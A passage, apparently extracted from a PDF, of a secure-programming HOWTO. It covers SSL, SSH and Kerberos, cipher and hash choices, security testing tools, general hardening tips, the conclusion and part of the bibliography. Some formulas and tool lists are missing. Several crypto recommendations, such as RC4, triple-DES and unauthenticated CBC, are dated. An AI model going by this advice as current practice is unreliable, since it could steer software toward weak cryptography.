relatively easy to use in programs, because most library implementations allow programmers to use
operations similar to the operations on standard sockets like SSL_connect(), SSL_write(), SSL_read(),
etc. A widely used OSS/FS implementation of SSL (as well as other capabilities) is OpenSSL,
available at http://www.openssl.org.
• OpenPGP and S/MIME. There are two competing, essentially incompatible standards for securing
email: OpenPGP and S/MIME. OpenPHP is based on the PGP application; an OSS/FS
implementation is GNU Privacy Guard from http://www.gnupg.org. Currently, their certificates are
often not interchangeable; work is ongoing to repair this.
• SSH. SSH is the primary method of securing “remote terminals” over an internet, and it also includes
methods for tunelling X Windows sessions. However, it’s been extended to support single sign-on and
general secure tunelling for TCP streams, so it’s often used for securing other data streams too (such
as CVS accesses). The most popular implementation of SSH is OpenSSH http://www.openssh.com,
which is OSS/FS. Typical uses of SSH allows the client to authenticate that the server is truly the
server, and then the user enters a password to authenticate the user (the password is encrypted and sent
to the other system for verification). Current versions of SSH can store private keys, allowing users to
not enter the password each time. To prevent man-in-the-middle attacks, SSH records keying
information about servers it talks to; that means that typical use of SSH is vulnerable to a
man-in-the-middle attack during the very first connection, but it can detect problems afterwards. In
contrast, SSL generally uses a certificate authority, which eliminates the first connection problem but
requires special setup (and payment!) to the certificate authority.
• Kerberos. Kerberos is a protocol for single sign-on and authenticating users against a central
authentication and key distribution server. Kerberos works by giving authenticated users "tickets",
granting them access to various services on the network. When clients then contact servers, the servers
can verify the tickets. Kerberos is a primary method for securing and supporting authentication on a
LAN, and for establishing shared secrets (thus, it needs to be used with other algorithms for the actual
protection of communication). Note that to use Kerberos, both the client and server have to include
code to use it, and since not everyone has a Kerberos setup, this has to be optional - complicating the
use of Kerberos in some programs. However, Kerberos is widely used.
Many of these protocols allow you to select a number of different algorithms, so you’ll still need to pick
reasonable defaults for algorithms (e.g., for encryption).
155
Chapter 11. Special Topics
analyzed it and not found any serious weakness in it, and I believe it has been through enough analysis to
be trustworthy now. In August 2002 researchers Fuller and Millar discovered a mathematical property of
the cipher that, while not an attack, might be exploitable and turned into an attack (the approach may
actually has serious consequences for some other algorithms, too). However, heavy-duty worldwide
analysis has yet to provide serious evidence that AES is actually vulnerable (see [Landau 2004] for more
technical information on Rijndael). It’s always worth staying tuned for future work, of course. A good
alternative to AES is the Serpent algorithm, which is slightly slower but is very resistant to attack. For
many applications triple-DES is a very good encryption algorithm; it has a reasonably lengthy key (112
bits), no patent issues, and a very long history of withstanding attacks (it’s withstood attacks far longer
than any other encryption algorithm with reasonable key length in the public literature, so it’s probably
the safest publicly-available symmetric encryption algorithm when properly implemented). However,
triple-DES is very slow when implemented in software, so triple-DES can be considered “safest but
slowest.” Twofish appears to be a good encryption algorithm, but there are some lingering questions -
Sean Murphy and Fauzan Mirza showed that Twofish has properties that cause many academics to be
concerned (though as of yet no one has managed to exploit these properties). MARS is highly resistent to
“new and novel” attacks, but it’s more complex and is impractical on small-ability smartcards. For the
moment I would avoid Twofish - it’s quite likely that this will never be exploitable, but it’s hard to be
sure and there are alternative algorithms which don’t have these concerns. Don’t use IDEA - it’s subject
to U.S. and European patents. Don’t use stupid algorithms such as XOR with a constant or constant
string, the ROT (rotation) scheme, a Vinegere ciphers, and so on - these can be trivially broken with
today’s computers. Don’t use “double DES” (using DES twice) - that’s subject to a “man in the middle”
attack that triple-DES avoids. Your protocol should support multiple encryption algorithms, anyway; that
way, when an encryption algorithm is broken, users can switch to another one.
For symmetric-key encryption (e.g., for bulk encryption), don’t use a key length less than 90 bits if you
want the information to stay secret through 2016 (add another bit for every additional 18 months of
security) [Blaze 1996]. For encrypting worthless data, the old DES algorithm has some value, but with
modern hardware it’s too easy to break DES’s 56-bit key using brute force. If you’re using DES, don’t
just use the ASCII text key as the key - parity is in the least (not most) significant bit, so most DES
algorithms will encrypt using a key value well-known to adversaries; instead, create a hash of the key
and set the parity bits correctly (and pay attention to error reports from your encryption routine).
So-called “exportable” encryption algorithms only have effective key lengths of 40 bits, and are
essentially worthless; in 1996 an attacker could spend $10,000 to break such keys in twelve minutes or
use idle computer time to break them in a few days, with the time-to-break halving every 18 months in
either case.
Block encryption algorithms can be used in a number of different modes, such as “electronic code book”
(ECB) and “cipher block chaining” (CBC). In nearly all cases, use CBC, and do not use ECB mode - in
ECB mode, the same block of data always returns the same result inside a stream, and this is often
enough to reveal what’s encrypted. Many modes, including CBC mode, require an “initialization vector”
(IV). The IV doesn’t need to be secret, but it does need to be unpredictable by an attacker. Don’t reuse
IV’s across sessions - use a new IV each time you start a session.
There are a number of different streaming encryption algorithms, but many of them have patent
restrictions. I know of no patent or technical issues with WAKE. RC4 was a trade secret of RSA Data
Security Inc; it’s been leaked since, and I know of no real legal impediment to its use, but RSA Data
Security has often threatened court action against users of it (it’s not at all clear what RSA Data Security
could do, but no doubt they could tie up users in worthless court cases). If you use RC4, use it as
intended - in particular, always discard the first 256 bytes it generates, or you’ll be vulnerable to attack.
SEAL is patented by IBM - so don’t use it. SOBER is patented; the patent owner has claimed that it will
156
Chapter 11. Special Topics
allow many uses for free if permission is requested, but this creates an impediment for later use. Even
more interestingly, block encryption algorithms can be used in modes that turn them into stream ciphers,
and users who want stream ciphers should consider this approach (you’ll be able to choose between far
more publicly-available algorithms).
157
Chapter 11. Special Topics
amount of data and generates a fixed-length number that hard for an attacker to invert (e.g., it’s difficult
for an attacker to create a different set of data to generate that same value). Historically MD5 was
widely-used, but by the 1990s there were warnings that MD5 had become too weak [van Oorschot 1994]
[Dobbertin 1996]. Papers have since shown that MD5 simply can’t be trusted as a cryptographic hash -
see http://cryptography.hyperlink.cz/MD5_collisions.html. Don’t use the original SHA (now called
“SHA-0”); SHA-0 had the same weakness that MD5 does. After MD5 was broken, SHA-1 was the
typical favorite, and it worked well for years. However, SHA-1 has also become too weak today; SHA-1
should never be used in new programs for security, and existing programs should be implementing
alternative hash algorithms. Today’s programs should be using better and more secure hash algorithms
such as SHA-256 / SHA-384 / SHA-512 or the newer SHA-3.
where H is the hash function and k is the key. This is defined in detail in IETF RFC 2104.
Note that in the HMAC approach, a receiver can forge the same data as a sender. This isn’t usually a
problem, but if this must be avoided, then use public key methods and have the sender “sign” the data
with the sender private key - this avoids this forging attack, but it’s more expensive and for most
environments isn’t necessary.
158
Chapter 11. Special Topics
11.7. Tools
Some tools may help you detect security problems before you field the result. They can’t find all such
problems, of course, but they can help catch problems that would overwise slip by. Here are a few tools,
emphasizing open source / free software tools.
159
Chapter 11. Special Topics
One obvious type of tool is a program to examine the source code to search for patterns of known
potential security problems (e.g., calls to library functions in ways are often the source of security
vulnerabilities). These kinds of programs are called “source code scanners”. Here are a few such tools:
160
Chapter 11. Special Topics
Some tools try to detect potential security flaws at run-time, either to counter them or at least to warn the
developer about them. Much of Crispin Cowan’s work, such as StackGuard, fits here.
There are several tools that try to detect various C/C++ memory-management problems; these are really
general-purpose software quality improvement tools, and not specific to security, but memory
management problems can definitely cause security problems. An especially capable tool is Valgrind,
which detects various memory-management problems (such as use of uninitialized memory,
reading/writing memory after it’s been free’d, reading/writing off the end of malloc’ed blocks, and
memory leaks). Another such tool is Electric Fence (efence) by Bruce Perens, which can detect certain
memory management errors. Memwatch (public domain) and YAMD (GPL) can detect memory
allocation problems for C and C++. You can even use the built-in capabilities of the GNU C library’s
malloc library, which has the MALLOC_CHECK_ environment variable (see its manual page for more
information). There are many others.
Another approach is to create test patterns and run the program, in attempt to find weaknesses in the
program. Here are a few such tools:
• BFBTester, the Brute Force Binary Tester, is licensed under the GPL. This program does quick
security checks of binary programs. BFBTester performs checks of single and multiple argument
command line overflows and environment variable overflows. Version 2.0 and higher can also watch
for tempfile creation activity (to check for using unsafe tempfile names). At one time BFBTester didn’t
run on Linux (due to a technical issue in Linux’s POSIX threads implementation), but this has been
fixed as of version 2.0.1. More information is available at http://bfbtester.sourceforge.net/
• The fuzz program is a tool for testing other software. It tests programs by bombarding the program
being evaluated with random data. This tool isn’t really specific to security.
• SPIKE is a "fuzzer creation kit", i.e., it’s a toolkit designed to create "random" tests to find security
problems. The SPIKE toolkit is particularly designed for protocol analysis by simulating network
protocol clients, and SPIKE proXy is a tool built on SPIKE to test web applications. SPIKE includes a
few pre-canned tests. SPIKE is licensed under the GPL.
There are a number of tools that try to give you insight into running programs that can also be useful
when trying to find security problems in your code. This includes symbolic debuggers (such as gdb) and
trace programs (such as strace and ltrace). One interesting program to support analysis of running code is
Fenris (GPL license). Its documentation describes Fenris as a “multipurpose tracer, stateful analyzer and
partial decompiler intended to simplify bug tracking, security audits, code, algorithm or protocol analysis
- providing a structural program trace, general information about internal constructions, execution path,
memory operations, I/O, conditional expressions and much more.” Fenris actually supplies a whole suite
of tools, including extensive forensics capabilities and a nice debugging GUI for Linux. A list of other
promising open source tools that can be suitable for debugging or code analysis is available at
http://lcamtuf.coredump.cx/fenris/debug-tools.html. Another interesting program along these lines is
Subterfugue, which allows you to control what happens in every system call made by a program.
If you’re building a common kind of product where many standard potential flaws exist (like an ftp
server or firewall), you might find standard security scanning tools useful. One good one is Nessus; there
are many others. These kinds of tools are very useful for doing regression testing, but since they
essentially use a list of past specific vulnerabilities and common configuration errors, they may not be
very helpful in finding problems in new programs.
161
Chapter 11. Special Topics
Often, you’ll need to call on other tools to implement your secure infrastructure. The Open-Source PKI
Book describes a number of open source programs for implementing a public key infrastructure (PKI).
Of course, running a “secure” program on an insecure platform configuration makes little sense. You may
want to examine hardening systems, which attempt to configure or modify systems to be more resistant
to attacks. For Linux, one hardening system is Bastille Linux, available at http://www.bastille-linux.org.
Another list of security tools is available at http://www.insecure.org/tools.html.
11.8. Windows CE
If you’re securing a Windows CE Device, you should read Maricia Alforque’s "Creating a Secure
Windows CE Device" at http://msdn.microsoft.com/library/techart/winsecurity.htm.
162
Chapter 11. Special Topics
11.11. Miscellaneous
The following are miscellaneous security guidelines that I couldn’t seem to fit anywhere else:
Have your program check at least some of its assumptions before it uses them (e.g., at the beginning of
the program). For example, if you depend on the “sticky” bit being set on a given directory, test it; such
tests take little time and could prevent a serious problem. If you worry about the execution time of some
tests on each call, at least perform the test at installation time, or even better at least perform the test on
application start-up.
If you have a built-in scripting language, it may be possible for the language to set an environment
variable which adversely affects the program invoking the script. Defend against this.
If you need a complex configuration language, make sure the language has a comment character and
include a number of commented-out secure examples. Often “#” is used for commenting, meaning “the
rest of this line is a comment”.
If possible, don’t create setuid or setgid root programs; make the user log in as root instead.
Sign your code. That way, others can check to see if what’s available was what was sent.
In some applications you may need to worry about timing attacks, where the variation in timing or CPU
utilitization is enough to give away important information. This kind of attack has been used to obtain
keying information from Smartcards, for example. Mauro Lacy has published a paper titled Remote
Timing Techniques, showing that you can (in some cases) determine over an Internet whether or not a
given user id exists, simply from the effort expended by the CPU (which can be detected remotely using
techniques described in the paper). The only way to deal with these sorts of problems is to make sure that
the same effort is performed even when it isn’t necessary. The problem is that in some cases this may
make the system more vulnerable to a denial of service attack, since it can’t optimize away unnecessary
work.
Consider statically linking secure programs. This counters attacks on the dynamic link library
mechanism by making sure that the secure programs don’t use it. There are several downsides to this
however. This is likely to increase disk and memory use (from multiple copies of the same routines).
Even worse, it makes updating of libraries (e.g., for security vulnerabilities) more difficult - in most
systems they won’t be automatically updated and have to be tracked and implemented separately.
163
Chapter 11. Special Topics
When reading over code, consider all the cases where a match is not made. For example, if there is a
switch statement, what happens when none of the cases match? If there is an “if” statement, what
happens when the condition is false?
Merely “removing” a file doesn’t eliminate the file’s data from a disk; on most systems this simply marks
the content as “deleted” and makes it eligible for later reuse, and often data is at least temporarily stored
in other places (such as memory, swap files, and temporary files). Indeed, against a determined attacker,
writing over the data isn’t enough. A classic paper on the problems of erasing magnetic media is Peter
Gutmann’s paper “Secure Deletion of Data from Magnetic and Solid-State Memory”. A determined
adversary can use other means, too, such as monitoring electromagnetic emissions from computers
(military systems have to obey TEMPEST rules to overcome this) and/or surreptitious attacks (such as
monitors hidden in keyboards).
When fixing a security vulnerability, consider adding a “warning” to detect and log an attempt to exploit
the (now fixed) vulnerability. This will reduce the likelihood of an attack, especially if there’s no way for
an attacker to predetermine if the attack will work, since it exposes an attack in progress. In short, it turns
a vulnerability into an intrusion detection system. This also suggests that exposing the version of a server
program before authentication is usually a bad idea for security, since doing so makes it easy for an
attacker to only use attacks that would work. Some programs make it possible for users to intentionally
“lie” about their version, so that attackers will use the “wrong attacks” and be detected. Also, if the
vulnerability can be triggered over a network, please make sure that security scanners can detect the
vulnerability. I suggest contacting Nessus (http://www.nessus.org) and make sure that their open source
security scanner can detect the problem. That way, users who don’t check their software for upgrades will
at least learn about the problem during their security vulnerability scans (if they do them as they should).
Always include in your documentation contact information for where to report security problems. You
should also support at least one of the common email addresses for reporting security problems
(security-alert@SITE, secure@SITE, or security@SITE); it’s often good to have support@SITE and
info@SITE working as well. Be prepared to support industry practices by those who have a security flaw
to report, such as the Full Disclosure Policy (RFPolicy) and the IETF Internet draft, “Responsible
Vulnerability Disclosure Process”. It’s important to quickly work with anyone who is reporting a security
flaw; remember that they are doing you a favor by reporting the problem to you, and that they are under
no obligation to do so. It’s especially important, once the problem is fixed, to give proper credit to the
reporter of the flaw (unless they ask otherwise). Many reporters provide the information solely to gain
the credit, and it’s generally accepted that credit is owed to the reporter. Some vendors argue that people
should never report vulnerabilities to the public; the problem with this argument is that this was once
common, and the result was vendors who denied vulnerabilities while their customers were getting
constantly subverted for years at a time.
Follow best practices and common conventions when leading a software development project. If you are
leading an open source software / free software project, some useful guidelines can be found in Free
Software Project Management HOWTO and Software Release Practice HOWTO; you should also read
The Cathedral and the Bazaar.
Every once in a while, review security guidelines like this one. At least re-read the conclusions in
Chapter 12, and feel free to go back to the introduction (Chapter 1) and start again!
164
Chapter 12. Conclusion
The end of a matter is better than its
beginning, and patience is better than
pride.
Ecclesiastes 7:8 (NIV)
Designing and implementing a truly secure program is actually a difficult task. The difficulty is that a
truly secure program must respond appropriately to all possible inputs and environments controlled by a
potentially hostile user. Developers of secure programs must deeply understand their platform, seek and
use guidelines (such as these), and then use assurance processes (such as inspections and other peer
review techniques) to reduce their programs’ vulnerabilities.
In conclusion, here are some of the key guidelines in this book:
• Validate all your inputs, including command line inputs, environment variables, CGI inputs, and so on.
Don’t just reject “bad” input; define what is an “acceptable” input and reject anything that doesn’t
match.
• Avoid buffer overflow. Make sure that long inputs (and long intermediate data values) can’t be used to
take over your program. This is the primary programmatic error at this time.
• Structure program internals. Secure the interface, minimize privileges, make the initial configuration
and defaults safe, and fail safe. Avoid race conditions (e.g., by safely opening any files in a shared
directory like /tmp). Trust only trustworthy channels (e.g., most servers must not trust their clients for
security checks or other sensitive data such as an item’s price in a purchase).
• Carefully call out to other resources. Limit their values to valid values (in particular be concerned
about metacharacters), and check all system call return values.
• Reply information judiciously. In particular, minimize feedback, and handle full or unresponsive
output to an untrusted user.
165
Chapter 13. Bibliography
The words of the wise are like goads,
their collected sayings like firmly
embedded nails--given by one Shepherd.
Be warned, my son, of anything in
addition to them. Of making many books
there is no end, and much study wearies
the body.
Ecclesiastes 12:11-12 (NIV)
Note that there is a heavy emphasis on technical articles available on the web, since this is where most of
this kind of technical information is available.
[Advosys 2000] Advosys Consulting (formerly named Webber Technical Services). Writing Secure Web
Applications. http://advosys.ca/tips/web-security.html
[Al-Herbish 1999] Al-Herbish, Thamer. 1999. Secure Unix Programming FAQ.
http://www.whitefang.com/sup.
[Aleph1 1996] Aleph1. November 8, 1996. “Smashing The Stack For Fun And Profit”. Phrack
Magazine. Issue 49, Article 14. http://www.phrack.com/search.phtml?view&article=p49-14 or
alternatively http://www.2600.net/phrack/p49-14.html.
[Anonymous 1999] Anonymous. October 1999. Maximum Linux Security: A Hacker’s Guide to
Protecting Your Linux Server and Workstation Sams. ISBN: 0672316706.
[Anonymous 1998] Anonymous. September 1998. Maximum Security : A Hacker’s Guide to Protecting
Your Internet Site and Network. Sams. Second Edition. ISBN: 0672313413.
[Anonymous Phrack 2001] Anonymous. August 11, 2001. Once upon a free(). Phrack, Volume 0x0b,
Issue 0x39, Phile #0x09 of 0x12. http://phrack.org/show.php?p=57&a=9
[AUSCERT 1996] Australian Computer Emergency Response Team (AUSCERT) and O’Reilly. May 23,
1996 (rev 3C). A Lab Engineers Check List for Writing Secure Unix Code.
ftp://ftp.auscert.org.au/pub/auscert/papers/secure_programming_checklist
[Bach 1986] Bach, Maurice J. 1986. The Design of the Unix Operating System. Englewood Cliffs, NJ:
Prentice-Hall, Inc. ISBN 0-13-201799-7 025.
[Beattie 2002] Beattie, Steve, Seth Arnold, Crispin Cowan, Perry Wagle, Chris Wright, Adam Shostack.
November 2002. Timing the Application of Security Patches for Optimal Uptime. 2002 LISA XVI,
November 3-8, 2002, Philadelphia, PA.
[Bellovin 1989] Bellovin, Steven M. April 1989. "Security Problems in the TCP/IP Protocol Suite"
Computer Communications Review 2:19, pp. 32-48. http://www.research.att.com/~smb/papers/ipext.pdf
[Bellovin 1994] Bellovin, Steven M. December 1994. Shifting the Odds -- Writing (More) Secure
Software. Murray Hill, NJ: AT&T Research. http://www.research.att.com/~smb/talks
[Bishop 1996] Bishop, Matt. May 1996. “UNIX Security: Security in Programming”. SANS ’96.
Washington DC (May 1996). http://olympus.cs.ucdavis.edu/~bishop/secprog.html
[Bishop 1997] Bishop, Matt. October 1997. “Writing Safe Privileged Programs”. Network Security 1997
New Orleans, LA. http://olympus.cs.ucdavis.edu/~bishop/secprog.html
166
Chapter 13. Bibliography
[Blaze 1996] Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce Schneier, Tsutomu Shimomura, Eric
Thompson, and Michael Wiener. January 1996. “Minimal Key Lengths for Symmetric Ciphers to
Provide Adequate Commercial Security: A Report by an Ad Hoc Group of Cryptographers and
Computer Scientists.” ftp://ftp.research.att.com/dist/mab/keylength.txt and
ftp://ftp.research.att.com/dist/mab/keylength.ps.
[CC 1999] The Common Criteria for Information Technology Security Evaluation (CC). August 1999.
Version 2.1. Technically identical to International Standard ISO/IEC 15408:1999. http://csrc.nist.gov/cc
[CERT 1998] Computer Emergency Response Team (CERT) Coordination Center (CERT/CC). February
13, 1998. Sanitizing User-Supplied Data in CGI Scripts. CERT Advisory CA-97.25.CGI_metachar.
http://www.cert.org/advisories/CA-97.25.CGI_metachar.html.
[Cheswick 1994] Cheswick, William R. and Steven M. Bellovin. Firewalls and Internet Security:
Repelling the Wily Hacker. Full text at http://www.wilyhacker.com.
[Clowes 2001] Clowes, Shaun. 2001. “A Study In Scarlet - Exploiting Common Vulnerabilities in PHP”
http://www.securereality.com.au/archives.html
[CMU 1998] Carnegie Mellon University (CMU). February 13, 1998 Version 1.4. “How To Remove
Meta-characters From User-Supplied Data In CGI Scripts”.
ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters.
[Cowan 1999] Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and Jonathan Walpole. “Buffer
Overflows: Attacks and Defenses for the Vulnerability of the Decade”. Proceedings of DARPA
Information Survivability Conference and Expo (DISCEX), http://schafercorp-ballston.com/discex
SANS 2000. http://www.sans.org/newlook/events/sans2000.htm. For a copy, see
http://immunix.org/documentation.html.
[Cox 2000] Cox, Philip. March 30, 2001. Hardening Windows 2000.
http://www.systemexperts.com/win2k/hardenW2K11.pdf.
[Crosby 2003] Crosby, Scott A., and Dan S Wallach. "Denial of Service via Algorithmic Complexity
Attacks" Usenix Security 2003. http://www.cs.rice.edu/~scrosby/hash.
[Dobbertin 1996]. Dobbertin, H. 1996. The Status of MD5 After a Recent Attack. RSA Laboratories’
CryptoBytes. Vol. 2, No. 2.
[Felten 1997] Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach. Web Spoofing: An
Internet Con Game Technical Report 540-96 (revised Feb. 1997) Department of Computer Science,
Princeton University http://www.cs.princeton.edu/sip/pub/spoofing.pdf
[Fenzi 1999] Fenzi, Kevin, and Dave Wrenski. April 25, 1999. Linux Security HOWTO. Version 1.0.2.
http://www.tldp.org/HOWTO/Security-HOWTO.html
[FHS 1997] Filesystem Hierarchy Standard (FHS 2.0). October 26, 1997. Filesystem Hierarchy Standard
Group, edited by Daniel Quinlan. Version 2.0. http://www.pathname.com/fhs.
[Filipski 1986] Filipski, Alan and James Hanko. April 1986. “Making Unix Secure.” Byte (Magazine).
Peterborough, NH: McGraw-Hill Inc. Vol. 11, No. 4. ISSN 0360-5280. pp. 113-128.
[Flake 2001] Flake, Havlar. Auditing Binaries for Security Vulnerabilities.
http://www.blackhat.com/html/win-usa-01/win-usa-01-speakers.html.
[FOLDOC] Free On-Line Dictionary of Computing. http://foldoc.doc.ic.ac.uk/foldoc/index.html.
[Forristal 2001] Forristal, Jeff, and Greg Shipley. January 8, 2001. Vulnerability Assessment Scanners.
Network Computing. http://www.nwc.com/1201/1201f1b1.html
167
Chapter 13. Bibliography
[FreeBSD 1999] FreeBSD, Inc. 1999. “Secure Programming Guidelines”. FreeBSD Security
Information. http://www.freebsd.org/security/security.html
[Friedl 1997] Friedl, Jeffrey E. F. 1997. Mastering Regular Expressions. O’Reilly. ISBN 1-56592-257-3.
[FSF 1998] Free Software Foundation. December 17, 1999. Overview of the GNU Project.
http://www.gnu.ai.mit.edu/gnu/gnu-history.html
[FSF 1999] Free Software Foundation. January 11, 1999. The GNU C Library Reference Manual.
Edition 0.08 DRAFT, for Version 2.1 Beta of the GNU C Library. Available at, for example,
http://www.netppl.fi/~pp/glibc21/libc_toc.html
[Fu 2001] Fu, Kevin, Emil Sit, Kendra Smith, and Nick Feamster. August 2001. “Dos and Don’ts of
Client Authentication on the Web”. Proceedings of the 10th USENIX Security Symposium, Washington,
D.C., August 2001. http://cookies.lcs.mit.edu/pubs/webauth.html.
[Gabrilovich 2002] Gabrilovich, Evgeniy, and Alex Gontmakher. February 2002. “Inside Risks: The
Homograph Attack”. Communications of the ACM. Volume 45, Number 2. Page 128.
[Galvin 1998a] Galvin, Peter. April 1998. “Designing Secure Software”. Sunworld.
http://www.sunworld.com/swol-04-1998/swol-04-security.html.
[Galvin 1998b] Galvin, Peter. August 1998. “The Unix Secure Programming FAQ”. Sunworld.
http://www.sunworld.com/sunworldonline/swol-08-1998/swol-08-security.html
[Garfinkel 1996] Garfinkel, Simson and Gene Spafford. April 1996. Practical UNIX & Internet Security,
2nd Edition. ISBN 1-56592-148-8. Sebastopol, CA: O’Reilly & Associates, Inc.
http://www.oreilly.com/catalog/puis
[Garfinkle 1997] Garfinkle, Simson. August 8, 1997. 21 Rules for Writing Secure CGI Programs.
http://webreview.com/wr/pub/97/08/08/bookshelf
[Gay 2000] Gay, Warren W. October 2000. Advanced Unix Programming. Indianapolis, Indiana: Sams
Publishing. ISBN 0-67231-990-X.
[Geodsoft 2001] Geodsoft. February 7, 2001. Hardening OpenBSD Internet Servers.
http://www.geodsoft.com/howto/harden.
[Graham 1999] Graham, Jeff. May 4, 1999. Security-Audit’s Frequently Asked Questions (FAQ).
http://lsap.org/faq.txt
[Gong 1999] Gong, Li. June 1999. Inside Java 2 Platform Security. Reading, MA: Addison Wesley
Longman, Inc. ISBN 0-201-31000-7.
[Gundavaram Unknown] Gundavaram, Shishir, and Tom Christiansen. Date Unknown. Perl CGI
Programming FAQ. http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.html
[Hall 1999] Hall, Brian "Beej". Beej’s Guide to Network Programming Using Internet Sockets.
13-Jan-1999. Version 1.5.5. http://www.ecst.csuchico.edu/~beej/guide/net
[Howard 2002] Howard, Michael and David LeBlanc. 2002. Writing Secure Code. Redmond,
Washington: Microsoft Press. ISBN 0-7356-1588-8.
[ISO 12207] International Organization for Standardization (ISO). 1995. Information technology --
Software life cycle processes ISO/IEC 12207:1995.
[ISO 13335] International Organization for Standardization (ISO). ISO/IEC TR 13335. Guidelines for
the Management of IT Security (GMITS). Note that this is a five-part technical report (not a standard);
see also ISO/IEC 17799:2000. It includes:
168
Chapter 13. Bibliography
[ISO 17799] International Organization for Standardization (ISO). December 2000. Code of Practice for
Information Security Management. ISO/IEC 17799:2000.
[ISO 9000] International Organization for Standardization (ISO). 2000. Quality management systems -
Fundamentals and vocabulary. ISO 9000:2000. See
http://www.iso.ch/iso/en/iso9000-14000/iso9000/selection_use/iso9000family.html
[ISO 9001] International Organization for Standardization (ISO). 2000. Quality management systems -
Requirements ISO 9001:2000
[Jones 2000] Jones, Jennifer. October 30, 2000. “Banking on Privacy”. InfoWorld, Volume 22, Issue 44.
San Mateo, CA: International Data Group (IDG). pp. 1-12.
[Kelsey 1998] Kelsey, J., B. Schneier, D. Wagner, and C. Hall. March 1998. "Cryptanalytic Attacks on
Pseudorandom Number Generators." Fast Software Encryption, Fifth International Workshop
Proceedings (March 1998), Springer-Verlag, 1998, pp. 168-188.
http://www.counterpane.com/pseudorandom_number.html.
[Kernighan 1988] Kernighan, Brian W., and Dennis M. Ritchie. 1988. The C Programming Language.
Second Edition. Englewood Cliffs, NJ: Prentice-Hall. ISBN 0-13-110362-8.
[Kim 1996] Kim, Eugene Eric. 1996. CGI Developer’s Guide. SAMS.net Publishing. ISBN:
1-57521-087-8 http://www.eekim.com/pubs/cgibook
[Kiriansky 2002] Kiriansky, Vladimir, Derek Bruening, Saman Amarasinghe. "Secure Execution Via
Program Shepherding". Proceedings of the 11th USENIX Security Symposium, San Francisco,
California, August 2002. http://cag.lcs.mit.edu/commit/papers/02/RIO-security-usenix.pdf
Kolsek [2002] Kolsek, Mitja. December 2002. Session Fixation Vulnerability in Web-based Applications
http://www.acros.si/papers/session_fixation.pdf.
[Kuchling 2000]. Kuchling, A.M. 2000. Restricted Execution HOWTO.
http://www.python.org/doc/howto/rexec/rexec.html
[Kuhn 2002] Kuhn, Markus G. Optical Time-Domain Eavesdropping Risks of CRT displays.
Proceedings of the 2002 IEEE Symposium on Security and Privacy, Oakland, CA, May 12-15, 2002.
http://www.cl.cam.ac.uk/~mgk25/ieee02-optical.pdf
[Landau 2004] Landau, Susan. Polynomials in the Nation’s Service: Using Algebra to Design the
Advanced Encryption Standard. 2004. American Mathematical Monthly.
http://research.sun.com/people/slandau/maa1.pdf
[LSD 2001] The Last Stage of Delirium. July 4, 2001. UNIX Assembly Codes Development for
Vulnerabilities Illustration Purposes. http://lsd-pl.net/papers.html#assembly.
[McClure 1999] McClure, Stuart, Joel Scambray, and George Kurtz. 1999. Hacking Exposed: Network
Security Secrets and Solutions. Berkeley, CA: Osbourne/McGraw-Hill. ISBN 0-07-212127-0.
169
Chapter 13. Bibliography
[McKusick 1999] McKusick, Marshall Kirk. January 1999. “Twenty Years of Berkeley Unix: From
AT&T-Owned to Freely Redistributable.” Open Sources: Voices from the Open Source Revolution.
http://www.oreilly.com/catalog/opensources/book/kirkmck.html.
[McGraw 1999] McGraw, Gary, and Edward W. Felten. December 1998. Twelve Rules for developing
more secure Java code. Javaworld.
http://www.javaworld.com/javaworld/jw-12-1998/jw-12-securityrules.html.
[McGraw 1999] McGraw, Gary, and Edward W. Felten. January 25, 1999. Securing Java: Getting Down
to Business with Mobile Code, 2nd Edition John Wiley & Sons. ISBN 047131952X.
http://www.securingjava.com.
[McGraw 2000a] McGraw, Gary and John Viega. March 1, 2000. Make Your Software Behave: Learning
the Basics of Buffer Overflows. http://www-4.ibm.com/software/developer/library/overflows/index.html.
[McGraw 2000b] McGraw, Gary and John Viega. April 18, 2000. Make Your Software Behave: Software
strategies In the absence of hardware, you can devise a reasonably secure random number generator
through software.
http://www-106.ibm.com/developerworks/library/randomsoft/index.html?dwzone=security.
[Miller 1995] Miller, Barton P., David Koski, Cjin Pheow Lee, Vivekananda Maganty, Ravi Murthy,
Ajitkumar Natarajan, and Jeff Steidl. 1995. Fuzz Revisited: A Re-examination of the Reliability of
UNIX Utilities and Services. ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.pdf.
[Miller 1999] Miller, Todd C. and Theo de Raadt. “strlcpy and strlcat -- Consistent, Safe, String Copy
and Concatenation” Proceedings of Usenix ’99. http://www.usenix.org/events/usenix99/millert.html and
http://www.usenix.org/events/usenix99/full_papers/millert/PACKING_LIST
[Mookhey 2002] Mookhey, K. K. The Unix Auditor’s Practical Handbook.
http://www.nii.co.in/tuaph.html.
[MISRA 1998] Guidelines for the use of the C language in Vehicle Based Software April 1998 The
